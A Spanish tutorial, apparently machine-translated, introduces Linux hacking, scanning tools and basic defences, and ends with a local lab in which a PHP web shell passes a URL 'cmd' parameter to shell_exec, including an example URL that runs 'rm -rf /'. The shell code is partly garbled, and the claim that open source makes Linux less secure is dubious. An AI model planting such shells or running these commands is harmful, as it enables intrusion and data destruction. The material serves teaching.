Hackear el sistema operativo Linux: Hackear con Ubuntu (Tutorial de comandos)

Tabla de contenido:

Anonim

Linux es el sistema operativo de servidor más utilizado, especialmente para servidores web. Es de código abierto; esto significa que cualquiera puede tener acceso al código fuente. Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades . Linux for Hackers trata de aprovechar estas vulnerabilidades para obtener acceso no autorizado a un sistema.

En este artículo, le presentaremos qué es Linux, sus vulnerabilidades de seguridad, la piratería con Ubuntu y las contramedidas que puede implementar.

Temas cubiertos en este tutorial

  • Nota rápida sobre Linux
  • Herramientas de piratería de Linux
  • Cómo prevenir los hackeos de Linux
  • Actividad de piratería: piratea un sistema Linux usando PHP

Nota rápida sobre Linux

Linux es un sistema operativo de código abierto . Hay muchas distribuciones de sistemas operativos basados ​​en Linux como Redhat, Fedora y Ubuntu, etc. A diferencia de otros sistemas operativos, Linux es menos seguro cuando se trata de seguridad. Esto se debe a que el código fuente está disponible gratuitamente, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlas en comparación con otros sistemas operativos que no son de código abierto. Linux se puede utilizar como sistema operativo de servidor, escritorio, tableta o dispositivo móvil.

Los programas de Linux se pueden operar usando GUI o comandos. Los comandos de Linux para la piratería de Kali Linux son más efectivos y eficientes en comparación con el uso de la GUI. Por esta razón, es útil conocer los comandos básicos de Linux para piratear.

Consulte estos tutoriales https://www.guru99.com/unix-linux-tutorial.html sobre cómo comenzar con los hacks de Kali Linux.

Herramientas de piratería de Linux

  • Nessus : esta herramienta se puede usar para piratear Ubuntu, escanear configuraciones, parches y redes, etc., se puede encontrar en https://www.tenable.com/products/nessus
  • NMap. Esta herramienta se puede utilizar para supervisar los hosts que se ejecutan en el servidor y los servicios que utilizan. También se puede utilizar para buscar puertos. Se puede encontrar en https://nmap.org/
  • SARA - SARA es el acrónimo de Security Auditor's Research Assistant. Como su nombre lo indica, esta herramienta se puede utilizar para auditar redes contra amenazas como SQL Injection, XSS, etc., se puede encontrar en http://www-arc.com/sara/sara.html

La lista de arriba no es exhaustiva; le da una idea de las herramientas disponibles para la piratería de Ubuntu y la piratería de sistemas Linux.

Cómo prevenir los hackeos de Linux

Linux Hacking se aprovecha de las vulnerabilidades del sistema operativo. Una organización puede adoptar la siguiente política para protegerse contra tales ataques.

  • Gestión de parches: los parches corrigen errores que los atacantes aprovechan para comprometer un sistema. Una buena política de administración de parches garantizará que aplique constantemente los parches relevantes a su sistema.
  • Configuración adecuada del sistema operativo : otras vulnerabilidades aprovechan las debilidades en la configuración del servidor. Los demonios y los nombres de usuario inactivos deben desactivarse. La configuración predeterminada, como las contraseñas comunes para la aplicación, los nombres de usuario predeterminados y algunos números de puerto, deben cambiarse.
  • Sistema de detección de intrusiones : estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir tales ataques.

Actividad de piratería: piratear un sistema Ubuntu Linux usando PHP

En este escenario práctico, aprenderemos cómo hackear con Ubuntu y le proporcionaremos información básica sobre cómo puede usar PHP para comprometer un Linux. No vamos a apuntar a ninguna víctima. Si desea probarlo, puede instalar LAMPP en su máquina local.

PHP viene con dos funciones que se pueden usar para ejecutar comandos de piratería de Linux. Tiene funciones exec () y shell_exec (). La función exec () devuelve la última línea de la salida del comando, mientras que shell_exec () devuelve el resultado completo del comando como una cadena.

Para fines de demostración, supongamos que los administradores de los atacantes cargan el siguiente archivo en un servidor web.

 $cmd
";$output = shell_exec($cmd);echo "
$output
";?>

AQUÍ,

El script anterior obtiene el comando de la variable GET llamada cmd. El comando se ejecuta usando shell_exec () y los resultados se devuelven en el navegador.

El código anterior se puede explotar utilizando la siguiente URL

http: //localhost/cp/konsole.php? cmd = ls% 20-l

AQUÍ,

  • “… Konsole.php? Cmd = ls% 20-l” asigna el valor ls -l a la variable cmd .

El comando en Ubuntu para piratear el servidor se ejecutará como

shell_exec('ls -l') ;

La ejecución del código anterior en un servidor web da resultados similares a los siguientes.

El comando anterior simplemente muestra los archivos en el directorio actual y los permisos

Supongamos que el atacante pasa el siguiente comando

rm -rf /

AQUÍ,

  • "Rm" elimina los archivos
  • “Rf” hace que el comando rm se ejecute en modo recursivo. Eliminando todas las carpetas y archivos
  • "/" Indica al comando que comience a eliminar archivos del directorio raíz

La URL del ataque se vería así

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

Resumen

  • Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos móviles.
  • Linux es de código abierto y cualquiera puede obtener el código fuente. Esto facilita la detección de vulnerabilidades. Es uno de los mejores sistemas operativos para piratas informáticos.
  • Los comandos de piratería básica y de redes en Ubuntu son valiosos para los piratas informáticos de Linux.
  • Las vulnerabilidades son una debilidad que se puede aprovechar para comprometer un sistema.
  • Una buena seguridad puede ayudar a proteger un sistema para que no se vea comprometido por un atacante.